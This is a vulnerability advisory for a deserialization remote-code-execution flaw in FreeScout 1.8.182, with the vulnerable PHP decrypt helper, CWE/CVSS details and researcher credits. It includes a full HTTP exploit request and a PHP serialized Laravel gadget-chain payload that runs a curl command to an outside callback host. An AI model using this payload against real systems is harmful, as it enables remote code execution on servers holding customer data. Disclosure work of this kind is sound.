/**
* Safely decrypt.
*
* @param [type] $e [description]
*
* @return [type] [description]
*/
public static function decrypt($value, $password = null)
{
try {
if (!$password) {
$value = decrypt($value);
} else {
$value = (new \Illuminate\Encryption\Encrypter(md5($password)))->decrypt($value);
}
} catch (\Exception $e) {
// Do nothing.
}
return $value;
}
GET /help/3665168609/auth/eyJpdiI6ICJ5T2dEM0h3MmNwVVBWSTZReldKYVVBPT0iLCAidmFsdWUiOiAiWTRmbGNCSDZWRVRtSEp6bjczdEZSUTZydTdrQlVSVkhuaUpVbWxDSDBxcFZMWVY5UzZ2TVp3SjM1WllDeWNQM3ljYXR0UWtOYW5yTE5LOTNCK0c4RTNzMUFjRHBvZys1V3NxN1U2M3I1Z2xqd1doVExqYXdiSExydkp1aUxidVk3Q3g1ZXR6YjJYbkNDeGl4Vkl1SlNRc3o5aHlwdlpnQW5CdGY1cnoxc2EySm0wcDJwZU9nWkxNcmxqZmo3SDZqTzJTWlVuWFFRY3AyV0hYVnBlV0lUdDRLQy8zbTJyditUMzFvNldmY0JXZXZiWitoeUNIZmhIY0p4aXpBME5kdmFQaCtXOXRZZ0tPL2g4ZmExbTN3bXhrQXc5OWx4dFUwSnlLYmZKTG8zL0pqd3V5bkdnNS9XenByN3ZMZDlLb3lVL3FpQ3RUdkppSjc0VkVseVFMOEUzRW53YkdMVFdUakVJNEJSeFNyUTU5QlJQYUwvWFlmTStxM2ZjZkxUZlNNQXVuQlJmSG8vVzVRWEVHS0tZNGdrdz09IiwgIm1hYyI6ICI0MmFkZGQ3ZmUwYmY1ODE3MjRiM2VjNDc2MGQ2MDhhOGNiZWYxZTk4ZjZiYjFkZWE0YzA4M2MzNWJjMDljZWY1IiwgInRhZyI6ICIifQ==/ef84dfd4/eyJpdiI6IkUyeHJCNkpaT2VUVXFkdjJ1SldRd2c9PSIsInZhbHVlIjoibHdqbXJsNXQ3SHVYU3R4SzJ1ZjN5dz09IiwibWFjIjoiYzBlZjMzZjYwOTljNzIyNmE1ZmE2ZDE2ZjdmMjFiYmVlZTM2ZjRhZDVjN2Y2M2M3N2ExNjQ5ZTY5OTEyMjkxNSJ9 HTTP/1.1
Host: freescout.web-hacks.ru
Cookie: laravel_session=eyJpdiI6ImVVRkcwbTVOZE1PWDB4bHU3TTBXZWc9PSIsInZhbHVlIjoielJrVUU4ZmxNdzJYVjVjUGVoa0ZERVNJMkZURUs1WWtGeTNQeEVOYk5HSmttT3lJcHl0QURxc0JjVWxXTTBiM25MNVJMTGZlbnFyRGY3ZmROVFhTY2FJcXZTQzhVcEtMc0xRSDM3ZTFnc25NOG82NXd0c0FJUEJaRFwvOXZYWURMIiwibWFjIjoiMjY1MzQ4Mzg5ZjZiM2FhNGIwOTZhZTY5Y2M0NzJjMTUyNzc3NThmZDU5YmI3OThiNDJiNDM1MDkzYzBhZTEzMSJ9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
a:4:{i:7;O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"%00*%00events";O:28:"Illuminate\Events\Dispatcher":1:{s:12:"%00*%00listeners";a:1:{s:46:"curl 097pa9w5cnrli4epluvehparhinab0zp.ssrf.pro";a:1:{i:0;s:6:"system";}}}s:8:"%00*%00event";s:46:"curl 097pa9w5cnrli4epluvehparhinab0zp.ssrf.pro";};i:7;i:7;}
Deserialization of untrusted data leads to Remote code execution (RCE) [1]
Product: FreeScout
Version: 1.8.182
CWE-ID:
• CWE-502: Deserialization of Untrusted Data
• CAPEC-586: Object Injection
CVSS vector v.4.0: 8.6 (AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)
Description: The application performs deserialization of data that can be tampered with. An attacker can create objects of arbitrary classes, as well as fully control their properties, thereby allowing them to manipulate the web application's logic.
Vulnerable scenarios: /help/{mailbox_id}/auth/{customer_id}/{hash}/{timestamp}
Vulnerable parameters:
• customer_id
• timestamp
Exploitation conditions: APP_KEY knowledge
Researchers: Daniil Satyaev, Roman Cheremnykh, Artem Danilov (Positive Technologies)
Research
Vulnerable code:
Listing Vulnerable code: (app/Helper.php 850-870)
Exploitation scenario:
Listing HTTP-request to exploit «Deserialization of untrusted data»
Listing Serialized payload to exploit blind rce